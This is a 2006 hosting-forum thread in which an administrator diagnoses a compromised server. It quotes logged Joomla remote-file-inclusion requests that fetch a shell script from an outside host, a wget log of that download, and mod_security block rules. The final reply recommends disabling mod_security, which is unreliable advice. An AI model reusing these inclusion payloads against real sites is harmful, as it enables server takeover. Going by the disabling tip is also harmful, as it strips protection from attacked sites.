Attacked - Perl processes/Mod_security - Help!

[jeroman8]

Hi!

The past 2 days I have had many, many Perl processes running.
When I can get in to the server load is between 100-150.
So to be able to work I kill all perl processes.

I thing it''s a php script being used to run a off site script.
My mod_Security seems to block a lot of stuff regarding similar stuff so I wonder if it
is possible that mod_Securtiy will fail if the server being attacked ?

What is the libwww-perl/5.805" at the end of the log below ?
It changes version number - like it's trying to find something....

I found a script in /tmp today, was not there yesterday, but could not see it
since my virus program stoped me from reading it.


72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
81.17.45.171 - - [22/Sep/2006:12:03:02 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.69"
193.198.217.3 - - [22/Sep/2006:12:03:24 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
66.36.233.10 - - [22/Sep/2006:12:03:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
62.199.234.50 - - [22/Sep/2006:12:03:29 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
70.85.88.196 - - [22/Sep/2006:12:03:43 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
66.148.74.139 - - [22/Sep/2006:12:04:02 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.79"

 

[jeroman8]

Look!

He managed to save the file to the server some how !!
Where the fu... is this file now - can't find it in tmp or the folders on "site" account...

[Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full
[Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full

[Fri Sep 22 12:20:51 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
[Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] mod_security: Access denied with code 403. Pattern match "(\\\\.\\\\./\\\\.\\\\.|/|(http|https|ftp)\\\\:/)" at ARG("mosConfig_absolute_path") [hostname "www.site.se"] [uri "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt?"]
[Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
--12:20:55-- http://www.mr-ylli.com/sh3llx.txt
=> `sh3llx.txt'
Resolving www.mr-ylli.com... 38.113.1.146
Connecting to www.mr-ylli.com|38.113.1.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,114 (17K) [text/plain]

0K .......... ...... 100% 373.41 KB/s

12:20:55 (373.41 KB/s) - `sh3llx.txt' saved [17114/17114]

 

[jeroman8]

This seems odd but I think it's named being the exploit here.

When all the PERL processes is running and I stop named it dissapears.
I just read about a new exploit in BIND.

http://www.niscc.gov.uk/niscc/docs/re-20060905-00590.pdf?lang=en

I think i'm being attacked....

I run BIND 9.2.4

 

[randomuser]

The past 2 days I have had many, many Perl processes running.
When I can get in to the server load is between 100-150.
So to be able to work I kill all perl processes.

/usr/sbin/lsof -p pid

I wonder if it
is possible that mod_Securtiy will fail if the server being attacked ?

fail to catch an attack? absolutely. it only blocks what it knows to block.
everything else will bypass modsec.

fail to continue to function? no.

What is the libwww-perl/5.805" at the end of the log below ?

this is the user-agent. look at some other logs to see different
user-agents (such as MSIE, Firefox, and so on). libwwww-perl
is generally a suspicious user-agent.

It changes version number - like it's trying to find something...

only changes because of a different version, like MSIE 5.0, or MSIE 6.0

I found a script in /tmp today, was not there yesterday, but could not see it
since my virus program stoped me from reading it.

don't use windows to view it then

logs

these are all 403s.

http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.4.4

Where the fu... is this file now

updatedb && locate sh3llx.txt, or
find /home -name sh3llx.txt
(use the manpages)

also, it may be in /tmp (or /var/tmp, or /dev/shm, depending on
your permissions and partition setup)

This seems odd but I think it's named being the exploit here.

When all the PERL processes is running and I stop named it dissapears.

[ .. ] pdf link [ .. ]

the pdf explains a DoS situation in BIND, but not arbitrary code execution,
just a DoS.


ps aux | grep perl
/usr/sbin/lsof -p pid

to see more info on the file.

who is the user, nobody, or are you using phpsuexec
and can see the actual user?

if you see the file in /tmp, do: stat filename
note the ctime/mtime, grep your domlogs for accesses
during this time, and find the vulnerable web script that
is being exploited. it could be anything, possibly something
with this path:

/administrator/components/com_comprofiler/plugin.class.php

or something else.

 

[ramprage]

That's an ancient joomla hole, not a hole in named. Unless they're trying to run some kind of exploit through joomla to further exploit the server.

Mod_security should easily stop these requests. Is it not for you? If not you need a new ruleset.

 

[jeroman8]

Thanks randomuser, I will check all this out.

Mod_sec is installed and blocking 99% of all attacks.
Obviously not all of them - I use 98% of hostmerits rules.

 

[ramprage]

What ones isn't it blocking? I can write some rules for ya

 

[jeroman8]

What ones isn't it blocking? I can write some rules for ya

This seem to block all of this:
SecFilterSelective HTTP_USER_AGENT "libwww-perl"

Hopefully there is now valid user agents named libwww-perl !?

 

[hostww]

It does block something that might be useful to customers...

Requesting IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action
65.61.156.43 2006-10-09 23:00:57 / HTTP/1.0 www.domain.com Access denied with code 403. Pattern match "libwww-perl" at HEADER("USER-AGENT") 403

[11:42pm] [N] Resolved server3.web-stat.com -> 65.61.156.43

 

[student]

This seem to block all of this:
SecFilterSelective HTTP_USER_AGENT "libwww-perl"

After applying this to mod_security, entries such:
"GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"

are still appearing in httpd log, is it normal? In mod_securiyty log i see that this connection is blocked, but if so, then how it is logged by apache? Shouldn't is be blocked first, even before apache can log this?

Ok, but speaking about mod_security rules, is it possible to filter all data link layer of all packets that are going through httpd? Im wondering how to block every packet that contains "#!/" string. Can mod_security do this?

 

[jeroman8]

Yes, it still logs the entry even if it is blocked.
They have access to the URL but instead of being delivered a 200ok and get the page they get the action 403 forbidden and do not get the page requested.

You can probably anything you like.

If you have not already - check out the host merit rules.
Do a search here for "host merit" "mod_security"

 

[ramprage]

You may set certain rules to nolog,allow if you want to not log them and bypass that rule.

 

[randomuser]

After applying this to mod_security, entries such:
"GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"

are still appearing in httpd log, is it normal? In mod_securiyty log i see that this connection is blocked, but if so, then how it is logged by apache? Shouldn't is be blocked first, even before apache can log this?

Ok, but speaking about mod_security rules, is it possible to filter all data link layer of all packets that are going through httpd? Im wondering how to block every packet that contains "#!/" string. Can mod_security do this?

The default log is a 406, not a 403, and logs to /usr/local/apache/logs/audit_log vice the domlog (edit: my apologies - it does in fact log to both places). From /usr/local/apache/conf/modsec.conf:

SecFilterDefaultAction "deny,log,status:406"

If you added the user agent rule to modsec.conf, it may have been overwritten by cPanel. All rules should be placed in modsec.user.conf at all times.

If you placed the rule in either modsec.conf or modsec.user.conf, you need to restart httpd for the new rule to work.

 

[meweb]

The default log is a 406, not a 403, and logs to /usr/local/apache/logs/audit_log vice the domlog (edit: my apologies - it does in fact log to both places). From /usr/local/apache/conf/modsec.conf:



If you added the user agent rule to modsec.conf, it may have been overwritten by cPanel. All rules should be placed in modsec.user.conf at all times.

If you placed the rule in either modsec.conf or modsec.user.conf, you need to restart httpd for the new rule to work.

Just make sure to add the following line in .htaccess file under your public_html Dir and restart the apache and see the result.

##################
SecFilterEngine Off
SecFilterScanPOST Off
##################